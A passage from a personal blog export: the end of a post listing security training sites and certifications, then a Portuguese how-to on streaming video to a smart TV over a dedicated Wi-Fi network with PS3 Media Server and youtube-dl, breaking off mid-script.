initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.securitytube.com -> A lots of security videos and tutorials.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.cybrary.it -> More security videos</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://pentesterlab.com -> Various pentest exercises</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://hackthebox.eu -> Various pentest exercises</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikipedia.org/wiki/Hacking:_The_Art_of_Exploitation -> Low Level exploitation</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.owasp.org</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://github.com/enaqx/awesome-pentest</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://worldwideprogramers.blogspot.com.br/2016/07/22-hacking-sites-ctfs-and-wargames-to.html?m=1</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Certifications/Training:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.offsec.com</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">https://kali.training/ --> </span><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><u style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">FREE TRANING! </span></u></strong></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">https://portswigger.net/web-security --> </span><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><u style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">FREE TRAINING! </span></u></strong></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.elearn.com -> Moved to https://ine.com/learning/paths -> CyberSecurity</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.sans.org</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.eccouncil.org/Certification/certified-ethical-hacker</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://courses.zeropointsecurity.co.uk/courses/red-team-ops<br />https://www.webhacking.com.br/ -> Portuguese language</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Here, there is a list of the most expressive certifications in CyberSecurity according to each area:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://pauljerimy.com/security-certification-roadmap/<br />Click on the image to enlarge it.<br /></span></span></p><div class="separator" style="clear: both; text-align: center;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwx2-dq9PWP9LIsq-VX6LV8Mmx-_Yoo6qHQbXeB3D7g2ubI_DB1W2ViLZom6kbbT8Rfd6D_pk5Zh5ScQ4zk1JowIGB75pXL558X_l53-REJqBMXBsjXPVKUP9vgtWF8TCK35nyJMSrt4uzihh293-bKcpv8T6KaL-Cl3OlfvXMZ8WZ0MNTjt1g3o5MjQ/s2529/cyber-sec-certs-2022.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1221" data-original-width="2529" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwx2-dq9PWP9LIsq-VX6LV8Mmx-_Yoo6qHQbXeB3D7g2ubI_DB1W2ViLZom6kbbT8Rfd6D_pk5Zh5ScQ4zk1JowIGB75pXL558X_l53-REJqBMXBsjXPVKUP9vgtWF8TCK35nyJMSrt4uzihh293-bKcpv8T6KaL-Cl3OlfvXMZ8WZ0MNTjt1g3o5MjQ/w640-h307/cyber-sec-certs-2022.png" width="640" /></a></span></div><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></span><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Building a pentest lab:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://pen-testing.sans.org/blog/2014/02/27/building-a-pen-test-infrastructure-hacking-at-home-on-the-cheap</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://community.rapid7.com/docs/DOC-2196</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.cybrary.it/0p3n/tutorial-for-setting-up-a-virtual-penetration-testing-lab-at-your-home/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, you can find an excellent pentest LAB for FREE on</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>www.hackthebox.eu</span></strong></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I recommend you take VIP access. It's about U$10/month, and it's totally worth it!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>How To Ask Questions The Smart Way:</span></strong></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.catb.org/esr/faqs/smart-questions.html</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Thanks to <Illusional> for the help! \o/</span></span></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-20349691217786404162015-09-12T03:36:00.004-07:002015-09-12T15:45:06.853-07:00Transmitir conteúdo para TV por wifi - NetWorkMedia NWM - DLNA<div class="MsoNormal">
Bom pessoal, <br />
<br />
Resolvi escrever este post por alguns motivos:<br />
Vi que muita gente tem o mesmo problema
que eu e nenhuma das soluções que procurei na internet não foram satisfatórias.<br />
Tive alguns problemas que outras pessoas não tiveram, ou tiveram e não
postaram.<br />
Tentei por 3 dias assitir o primeiro capitulo de Mr Robot e não conseguia.<br />
Queria ter internet e assistir filmes e
videos ao mesmo. <br />
Não queria ter que ligar cabos (hdmi) no pc/notebook e TV.<br />
Queria começar a assistir Mr Robot.<br />
<br />
Informação básica: Estou partindo do principio que você já saiba configurar sua
TV e sua rede. Se não sabe fazer isso, procure no Google como fazer e por favor
não poste no comentários coisas do tipo: Tenho uma LG Modelo XyZ pica das
galaxias como faço para configurar? Sério, eu não vou responder! Isso depende de
cada modelo, então estou mantendo o artigo o mais genérico possível.<br />
<br />
Não, não vou colocar Screenshots!<br />
<br />
Começando: <br />
<br />
Problema: Miracast e Widi não funcionam: Bom, eu tentei por alguns dias fazer essas
tecnologias funcionarem sem sucesso. Cada uma tem uma particularidade
diferente, requisitos de hardware e blabla que me fizeram desistir. <br />
<br />
Então, optei pela tecnologia DLNA (<a href="http://www.techtudo.com.br/dicas-e-tutoriais/noticia/2014/07/como-transmitir-conteudo-do-computador-pela-tv-wi-fi.html">http://www.techtudo.com.br/dicas-e-tutoriais/noticia/2014/07/como-transmitir-conteudo-do-computador-pela-tv-wi-fi.html</a>)
que como vocês podem ver no link é bem simples e fácil se configurar. Porém,
esbarrei em alguns algumas coisas: <br />
<br />
Meu roteador wifi está localizado no quarto e a TV na sala, os prédios aqui na
Polônia, os mais antigos, as paredes são bem grossas, mesmo a distancia sendo
pequena o sinal não é muito muito bom para transmissão de vídeo em Full HD por exemplo. Mas antes de descobrir isso, segui os passos
do link acima, e constantemente em partes
aleatórias do filme a conexão era interrompida, além disso, usando o Streaming
microsoft as legendas não são carregadas, mesmo que possuam o mesmo nome do
arquivo, como de costume. <o:p></o:p></div>
<div class="MsoNormal">
Procurei então outros softwares que desempenhassem a mesma
função e acabei encontrando o PS Media Server <a href="http://www.ps3mediaserver.org/">http://www.ps3mediaserver.org/</a>, ele
tem muita opções de codecs e as legendas são carregadas! \o/. <o:p></o:p></div>
<div class="MsoNormal">
Porém, durante a exibição, por varias vezes o filme ficando
coma mensagem de loading, logo fui investigar
a causa e descobri que o software faz encoding on-the-fly do conteúdo que
é enviado para TV e isso requer bastante
processamento e memoria.<br />
<br />
Procurei uma forma de utilizar encodes
mais leves inicialmente, sem sucesso nas opções fornecidas pelo software, então
resolvi desabilitar completamente o encoding, BINGO! <br />
A tela de loading parou de aparecer durante o filme(demora um pouco pra
carregar em alguns casos), porém, a rede voltou a cair durante a exibição.<br />
<br />
<!--[if !supportLineBreakNewLine]--><br />
<!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
Conclusão: Minha rede Wifi não está suportando a transmissão de vídeo e meu
acesso a internet simultaneamente. Lembre-se, no meu caso eu tenho paredes
grossas entre o quarto e a sala, pode ser que pra você isso não seja um problema.
<o:p></o:p></div>
<div class="MsoNormal">
Solução: Criei uma
rede separada somente para videos/musicas e afins em casa na qual chamei de NetWorkMedia
(NWM). Qual a vantagem? <br />
<br />
Você tem sua internet independente. <br />
Sua TV e equipamentos não tem acesso a internet diretamente, assim fica menos provável alguém explorar alguma
vulnerabilidade nos equipamentos. <br />
Você pode conectar seu amigos na sua NWM sem ter passar a senha da sua rede
Wifi pessoal. Eles podem usar notebook e celulares para enviar videos e musicas
aos seus equipamentos.<br />
Você tem uma rede dedicada para transmissão de videos e musica sem interferir
na sua Wifi Pessoal. <br />
Você pode usar seu computador como
ponte de acesso a internet, ou seja,
seus equipamentos não ficam ligados diretamente
na internet quando você não está em casa por exemplo e o melhor de tudo, SEM
FIOS, sem cabos HDMI espalhados pela casa. <br />
O notebook/pc não precisa ficar perto da televisão pois o cabo é pequeno e por
ai vai.<o:p></o:p></div>
<div class="MsoNormal">
<br />
Problema: Sua tv não tem acesso direto a
internet: <br />
Solução: Como disse anteriormente você pode usar um computador qualquer para fazer esta “ponte” entre seus equipamentos
e a internet. <br />
<br />
Para as minhas necessidades eu fiz a configuração para acesso a radio <a href="http://www.di.fm/">www.di.fm</a> e
para transmissão de videos do youtube.
No caso do youtube você pode pode fazer de duas maneiras: <br />
<br />
1- Baixar o vídeo e fazer a transmissão off-line.<br />
2- Usar um plugin para o PMS que faz a transmissão on-the-fly do conteúdo. <br />
<br />
Então até este momento temos: <br />
Uma rede de 300 megas wifi para
videos/musicas e afins. Pelos meus cálculos uma taxa de transferência de
cerca de 60 megas é suficiente para
assistir filmes em Full HD e 4K sem problemas.<br />
Isolada da internet ou não. ( Depende de
como você vai querer usar)<br />
Acesso rápido é fácil para visitantes.<br />
Baixo custo ( no meu caso) aushuashuasha<br />
0 Cabos!!!!!! Eu realmente odeio cabos! </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Vamos as configurações: (Receita de bolo) </div>
<div class="MsoNormal">
Rede: <br />
Rede Pessoal: <br />
1 roteador/AP 802.11n<br />
Acesso a internet <br />
1 placa wifi 802.11n do notebook ou PC – Pode ser uma Ethernet. 100/1000<br />
<br />
Configuração: <br />
Roteador IP: 192.168.0.1<br />
Notebook IP(wifi pessoal): 192.168.0.100 => Recomendo que o IP seja fixo
para facilitar as coisas.<br />
Mascara de rede: 255.255.255.0<br />
Default Gateway: 192.168.0.1<br />
DNS: 8.8.8.8 e 8.8.4.4 => DNS do
google, use o que achar melhor.<br />
<br />
NetWorkMedia(NWM)<br />
1 Roteador 802.11n - Sem internet <br />
1 Dongle USB Wifi 802.11n<br />
1 Smart TV com Wifi ou Ethernet (Lógico!)<br />
<br />
Configuração<br />
Roteador: 192.168.1.1 -> ATENÇÃO! O IP/REDE precisa obrigatoriamente ser diferente da rede pessoal!!!!<o:p></o:p></div>
<div class="MsoNormal">
NoteBook IP(NWM – dongle usb): 192.168.1.100 -> Mesma
recomendação<br />
Mascara de Rede: 255.255.255.0<br />
Default Gateway: 192.168.1.1<br />
DNS -> Não é necessário, não temos internet aqui.<o:p></o:p></div>
<div class="MsoNormal">
Smar TV -> Você deixar sua Smart TV fazer as
configurações sozinhas ou configura-la
na mesma faixa de ip da NWM, por exemplo 192.168.1.101. <br />
<br />
Bata tudo no liquidificador e leve ao forno por 2 horas. Uahsuahsuahushas <br />
<br />
<br />
Softwares e versões: <br />
<br />
Para TV: Verifique se a TV tem suporte DLNA, se não tiver compre uma! Aushausuahs<br />
<br />
Para o notebook: PS Media Server 1.90.1
- http://www.ps3mediaserver.org/<br />
Plugin: PMSEncoder 2.0.0 - <a href="https://github.com/chocolateboy/pmsencoder">https://github.com/chocolateboy/pmsencoder</a><br />
youtube-dl - <a href="https://yt-dl.org/downloads/2015.09.09/youtube-dl.exe">https://yt-dl.org/downloads/2015.09.09/youtube-dl.exe</a><br />
RTMP Dump 2.4 -> Não vamos utilizar
neste artigo, mas é bom você baixar.<br />
<br />
Faça a instalação PMS<br />
Faça a o download do psmenconder (JAR) e o coloque dentro do diretório plugins
criado na instalação do PMS. <br />
<br />
Após este processo, crie o arquivo WEB.conf em
C:\ProgramData\PMS\ <o:p></o:p></div>
<div class="MsoNormal">
Este arquivo contem a configuração para as minhas rádio favorita e um link para um vídeo do youtube. Você deve seguir exatamente o mesmo modelo
para adicionar novos videos. Neste link você tem mais detalhes: <a href="https://code.google.com/p/ps3mediaserver/issues/attachmentText?id=294&aid=5613783387044830644&name=web.conf&token=51e35537a9ee8f2b0e265857c2c91ccf">https://code.google.com/p/ps3mediaserver/issues/attachmentText?id=294&aid=5613783387044830644&name=web.conf&token=51e35537a9ee8f2b0e265857c2c91ccf</a><br />
<br />
Segue o meu WEB.conf<br />
<br />
# audio streams<o:p></o:p></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Goa-Psy
Trance,http://pub6.di.fm:80/di_goapsy_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Vocal
Trance,http://pub7.di.fm:80/di_vocaltrance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Progressive
Psy,http://pub4.di.fm:80/di_progressivepsy_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Lounge,http://pub5.di.fm:80/di_lounge_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Hard
Dance,http://pub8.di.fm:80/di_harddance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Hard
Techno,http://pub8.di.fm:80/di_hardtechno_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-House,http://pub7.di.fm:80/di_house_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Epic
Trance,http://pub6.di.fm:80/di_epictrance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Electro
House,http://pub7.di.fm:80/di_electrohouse_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Drumstep,http://pub8.di.fm:80/di_drumstep_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Dark
PsyTrance,http://pub6.di.fm:80/di_darkpsytrance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Classic
Trance,http://pub4.di.fm:80/di_classictrance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Classic
Vocal
Trance,http://pub7.di.fm:80/di_classicvocaltrance_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Chillout
Dreams,http://pub5.di.fm:80/di_chilloutdreams_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Chillout,http://pub8.di.fm:80/di_chillout_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">audiostream.Web,Radio=DiFM-Chill
& Tropical House,http://pub6.di.fm:80/di_chillntropicalhouse_aac?b9ee7b9f36ecd5124c92c723<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
# youtube<o:p></o:p></div>
<div class="MsoNormal">
videostream.Web,Youtube,https://www.youtube.com/watch?v=YqeW9_5kURI,https://www.youtube.com/watch?v=YqeW9_5kURI
<br />
<br />
<br />
Depois deste passo, você precisa adicionar
essas linhas no arquivo PMS.conf que
fica no mesmo diretório do WEB.conf: <br />
<br />
youtube-dl.path = C:\\ProgramData\\PMS\\youtube-dl.exe<br />
pmsencoder.script.directory = C:\\ProgramData\\PMS\\scripts<br />
<br />
Obs: Sim, são duas barras, eu não digitei errado! <br />
<br />
Agora, faça o download do youtube-dl e o coloque em C:\ProgramData\PMS\<br />
<br />
Crie o diretório scripts dentro de C:\ProgramData\PMS\
e dentro dele crie o arquivo youtube.groovy com o seguinte conteúdo: <br />
<!--[if !supportLineBreakNewLine]--><br />
<!--[endif]--><o:p></o:p></div>
<div class="MsoNormal">
<span lang="EN-US">script {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> profile ('YouTube-DL') {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> pattern {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> match { YOUTUBE_DL_PATH }<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> protocol([ 'http', 'https' ])<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> match { isYouTubeDLCompatible(YOUTUBE_DL_PATH,
uri) }<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"> action {<o:p></o:p></span></div>
<div class="MsoNormal">
